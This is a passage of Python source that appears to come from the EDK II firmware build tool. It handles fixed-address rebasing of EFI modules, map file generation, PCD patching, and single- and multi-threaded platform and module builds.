ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
# Initialize all modules in tracking to False (FAIL)
if Ma not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma] = False
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
# Initialize all modules in tracking to False (FAIL)
if Ma not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma] = False
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.items():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
all_lib_set = set()
all_mod_set = set()
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
all_mod_set.add(Module)
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
all_mod_set.add(Module)
for Module in all_mod_set:
for lib in Module.LibraryAutoGenList:
all_lib_set.add(lib)
for lib in all_lib_set:
lib.CreateAsBuiltInf(True)
all_lib_set.clear()
all_mod_set.clear()
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
